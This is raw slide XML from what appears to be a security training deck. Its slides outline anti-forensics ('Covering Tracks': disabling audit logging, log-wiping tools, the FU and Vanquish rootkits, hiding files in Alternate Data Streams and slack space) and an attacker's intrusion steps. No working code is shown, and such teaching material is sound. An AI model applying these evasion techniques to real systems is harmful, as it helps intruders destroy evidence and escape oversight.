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7650" name="Picture 2" descr="http://www.fastandeasyhacking.com/images/screenshots/armitage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5800" y="1219200"/>
            <a:ext cx="7033497" cy="54864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277581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382000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Covering Tracks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2969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400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Disable logging:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Auditpol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> command-line tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Clear the log file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Winzapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, Evidence Eliminator, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Elsave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Use rootkits:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>FU  and Vanquish </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>File Hiding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Locate hidden attribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Use Alternative Data Streams (ADS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Hide in slack space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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8463093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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perspectives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41842" y="1219200"/>
            <a:ext cx="8573558" cy="5029200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Attacker Perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	1. Exploit found vulnerabilities to get onto target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	2. Use exploits that are potentially unknown to minimize detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	3. Navigate through a network to score</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		passwords, secret plans, intellectual property, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r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ctr"/>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…LEARN…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ATTACK!!!!!!	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" 